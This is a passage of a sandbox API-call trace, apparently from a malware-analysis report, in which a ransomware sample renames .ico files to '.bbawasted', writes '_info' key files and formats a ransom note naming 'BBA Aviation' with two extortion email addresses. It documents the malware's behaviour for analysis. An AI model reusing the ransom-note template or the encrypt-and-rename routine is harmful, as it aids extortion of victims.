hHeap=0x660000) returned 1 [0163.506] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0163.506] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JDU3pnUR+6ioJeGxjIPIQVoE+SY+kRTZY4DR21rd93n5zMZPembyg8r5XnpL65I7\r\nUu9sQffhNIfxtErxRtn5LOhwdgQL/4TEGXzcGQsYZfltLKMnGwrSQAy6p/B3Wv2F\r\nyPNfCWKQRgQwt1CdJ6lBSDDwyNa+cccOl29wlER+Zn6UAhfN6i7jRHB3dULrX2Ny\r\n1OwxGPL6EaFiUJXMFgnMRv3GwBTq+TCaKS1O1TLFduDC2dCw5jF7IvjFunbuRf0i\r\nA1t1mJcwAMJK6wZlY0yEZV4ft6D+/n2V/Vfbnc8JQD3QsryyH+9x3SIMzbX/v0NH\r\n79fl7Bo3iuEipD2+h0oQ9QTL/mkTzoYOg4CAL1xpDxId5mtQUft8YbC+sQymY/oa\r\nQR7QDmwjWPQMtqV5Otk41Q0mIsgu1DrC5ZMg4z1tOVnxCBqzX7qwvu2Gg3WrDbuI\r\nI9wXl2YeTSiZSSWuVOVfvTSMW+1Q967c7BAwOkZ2O+dfXz6ritkoOwI1BQ59Eu9m\r\nYx8pe91G4ChtTJo7wKwDjSf+L1OPEcH47Xc01d9oHUZBJ1lXHmLGamyIh2pLO4Tq\r\n1zADQ6WO5NsLc23+AXMPLVAnzvCMstGxuT0qrC5upGV0Zhg1NOLi727AVtMtouJQ\r\nDC0rieYWwku/UyrtCjln7WJqRq4pBzuEdX+xBCIFj3A=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.506] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.506] WriteFile (in: hFile=0x294, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0163.506] SetEndOfFile (hFile=0x294) returned 1 [0163.509] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0163.509] CloseHandle (hObject=0x294) returned 1 [0163.511] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0548 | out: hHeap=0x660000) returned 1 [0163.511] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3728 | out: hHeap=0x660000) returned 1 [0163.511] _aulldvrm () returned 0x0 [0163.511] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66d1d0) returned 1 [0163.512] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.512] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0163.512] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 46 [0163.512] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6aecf0 [0163.512] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.512] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0163.512] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef60) returned 1 [0163.513] CryptGenRandom (in: hProv=0x6aef60, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0163.513] CryptReleaseContext (hProv=0x6aef60, dwFlags=0x0) returned 1 [0163.513] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0163.672] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.673] SetEndOfFile (hFile=0x27c) returned 1 [0163.673] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0163.673] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.bbawasted")) returned 1 [0163.675] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0163.675] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0163.676] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x37e [0163.676] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0163.676] CloseHandle (hObject=0x288) returned 1 [0163.680] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.680] CloseHandle (hObject=0x280) returned 1 [0163.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a3670 [0163.680] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef60) returned 1 [0163.681] CryptGenRandom (in: hProv=0x6aef60, dwLen=0x1b8, pbBuffer=0x6a36b8 | out: pbBuffer=0x6a36b8) returned 1 [0163.681] CryptReleaseContext (hProv=0x6aef60, dwFlags=0x0) returned 1 [0163.681] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef60) returned 1 [0163.682] CryptGenRandom (in: hProv=0x6aef60, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0163.682] CryptReleaseContext (hProv=0x6aef60, dwFlags=0x0) returned 1 [0163.691] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0163.692] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0163.692] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fKygKcp4c97tJ8j2Oo/D687FL4c7ZYUddAj3nuY/dWY0Vq3iTQ9yan7Yyhm7lvRf\r\n9QlPlpzoTN3Fb2BuHoZrIoc1YtBcnWcxXjrEW4L1pwO47XVn5J4pv9UJBqq+QcPa\r\nIOYTihOgpSKgAoKFs5Cs2VkLWUf/AoUSsTP01e9RrgoQb1hnHCUJ8zRga0GDrDfa\r\ny/8X7qgmLNPA3uB2uoYQoD1cMtKqH0GIraqUP+Qu8PDLZwp+yFypI+/KEF57UkRj\r\nW769NQ2GRMO/ilyB5Fku30t+RUQuckx2vCoNGGeXIuD3dANtK58iv97NeJPYs5gu\r\nH6cBECrLf4DNQr5HXy0B0mj5Fcg8jnireSHF+UP9bdXd6rnvCOY6t2ioBUwKrc+o\r\nYympvbEdkjIAUIeKgYzo9XGs2XletDy35SHpoK4C5zqn72Z15oRzDgk1DI1OFsTD\r\n3VcHZPYs2puQArJbXXIGEoehg7A+2tyTMFRrR3Ai9xRgTjURnQR+poLViMZq1xza\r\nTiKAyUo826SBDOPmhVM6hkRIQ9HmOZ7DBn3K+gQ8vQjkL1834nYkLctSgu/38UkF\r\nl1UUcwkIQdq8UgX4SqZvKpcf0KRkNqdmSe0SJDofRHgiMganqCB7WYLWmhADT0bT\r\nM149XxtFmndnxuUeY9EBprCAvvzYSc3BlaRsJKb2PHz=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.692] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0163.692] SetEndOfFile (hFile=0x27c) returned 1 [0163.699] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0163.699] CloseHandle (hObject=0x27c) returned 1 [0163.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0163.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3950 | out: hHeap=0x660000) returned 1 [0163.704] _aulldvrm () returned 0x0 [0163.704] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66c898) returned 1 [0163.705] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.705] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.705] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 46 [0163.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6aecf0 [0163.705] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0163.706] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef60) returned 1 [0163.706] CryptGenRandom (in: hProv=0x6aef60, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0163.706] CryptReleaseContext (hProv=0x6aef60, dwFlags=0x0) returned 1 [0163.706] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0163.792] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.793] SetEndOfFile (hFile=0x27c) returned 1 [0163.794] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0163.794] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.bbawasted")) returned 1 [0163.795] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0163.795] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0163.796] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x37e [0163.796] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0163.796] CloseHandle (hObject=0x280) returned 1 [0163.805] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.805] CloseHandle (hObject=0x288) returned 1 [0163.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a3670 [0163.805] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x66c898) returned 1 [0163.806] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x6a36b8 | out: pbBuffer=0x6a36b8) returned 1 [0163.806] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.806] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x66c898) returned 1 [0163.806] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0163.806] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0163.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.816] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QxxzDWyVPOYwsN2hndW7bBlym9Ls4QKnnaYqrF/XsWPLgEb9VqpoW5Qu60LSrjWP\r\nV8EF3wYn/wzpbp84ksdIcUGvknmiqkGEjumtOlvOb0DrOxmIZGg/1KM0p/fB3yze\r\nFiejOH3dvTtsU9TLeY5/KLuPZxxSF5cKeXLKwy9qGvs4ry7/QuY/ExV+2cXXfQX0\r\nnOUHRLBahs+5Ct42b2T5KDp/Jg+ovzqMAoUlforOPPHbiYb43FkstRxOWH4jsCZT\r\nwocVVc6XBbLSsjjEHw+in5hjbX0M/bb+eqLCzmXBnOjMv36hTzO1p6TT3hHXgCGM\r\nt/grb5VrjE+ASuI3/f7HMCGH8l/Pss3YSH2xUWmijuLZpr8mAZljafaOZqgn5Yv9\r\n1I9A3feLfsRV9Okts57YuHWjKDaDyjwmy4jwN8hfUywQY/7B2ibM98rcSB2Wcn8d\r\nHaxO8TMIqVWGBkvjR08XuuX05DTAxuvEAwzIyW6thWPhNxIvtXoUTaXSyu5m77os\r\nVFIPFGkw2fKS8rF+lVNep0V2HbiWXk2kDiVDRs/tmiFP8ALXKQbtx3L0K0igI0k7\r\nOz7gVNia+0ZuXkGueLqibf29p14TT5JkQYL3P3+Bt71Kd12UkvLvVgnQ/rhZoUjF\r\n5J96OYC0Yr0QxMer1IAZzsUksLR2dJMJ5HoVvETuSrf=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.817] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0163.817] SetEndOfFile (hFile=0x27c) returned 1 [0163.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.820] CloseHandle (hObject=0x27c) returned 1 [0163.831] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0163.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3a08 | out: hHeap=0x660000) returned 1 [0163.977] _aulldvrm () returned 0x0 [0163.977] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66c898) returned 1 [0163.977] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0163.978] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.978] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 46 [0163.978] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6aecf0 [0163.978] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.978] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.978] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef60) returned 1 [0163.978] CryptGenRandom (in: hProv=0x6aef60, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.978] CryptReleaseContext (hProv=0x6aef60, dwFlags=0x0) returned 1 [0163.979] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0163.979] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.981] SetEndOfFile (hFile=0x288) returned 1 [0163.981] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.981] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.981] lstrcpyW (in: lpString1=0x6aed4c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.bbawasted")) returned 1 [0163.982] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0163.982] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0163.982] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x37e [0163.982] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x650000 [0163.982] CloseHandle (hObject=0x280) returned 1 [0164.000] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0164.000] CloseHandle (hObject=0x290) returned 1 [0164.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.001] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0164.001] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.001] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0164.001] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0164.002] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0164.002] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0164.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a3670 [0164.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.013] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eqy1um76A/sJs38tN183rfTKvt3QN0QGTbZXUEN1GP+WcBVYCvvu8ifisO7Wofin\r\noDmg5rJPWc+3EJ4eE0qlaoKUdl/TFQRU0EVEP1yTLru2Mho8iHAJy7CJCWEqhcZh\r\n5EhZgUyOUpCDS2h9yT7qWx4y9mAUG62uyz7QOOr9p1GenbKigNz/PBh0cQg8qqi6\r\nVg+2PX3VOg6LCdF9yK0+7mlnTfdq2ItSOgBJcxlTexNaO7U3mMH1jwDNSQMUF0mX\r\nQ7e55CjRm+MeJoK/a7xJSfKMHkT4sCoFNRgMktuNQXAJpeoqr+/rVO2S7vgDVx26\r\nmsfpEiuHty56WQU2Ud1bYO51uw++oXAEPfA/yLjCDu6hq52WuEXuqINIjVpaoSiz\r\n17UYUY0JblWgrEJ/KFGWD8fhtDXUYjogvhkX2FoUBErmNa2sTBKF0aBI4E/QjOwM\r\nvALXLdJdGQ1kVasGQGjXrsxyyujEUceJVBwFQS8nwFGVSQhk4NG/qBcNQhgSdlCS\r\n4e9eL2AOtEnsomUf/gXqfViXpEiiZUzWgiJUqkGpp5k3wIq+jBq5hj3R+j1UfBlr\r\ndtG4toNWRicJEn1QzqqfuGtnnD4juIUcQjAVGgEBhHJJyPvdevpzbXshB6R7OR0p\r\ng5NKq5+zE0Gzw5KXtnjg2nLZQkOb6L3r/EKq+keiVtW=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0164.013] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0164.013] SetEndOfFile (hFile=0x288) returned 1 [0164.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.016] CloseHandle (hObject=0x288) returned 1 [0164.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0164.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3b78 | out: hHeap=0x660000) returned 1 [0164.018] _aulldvrm () returned 0x0 [0164.018] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, 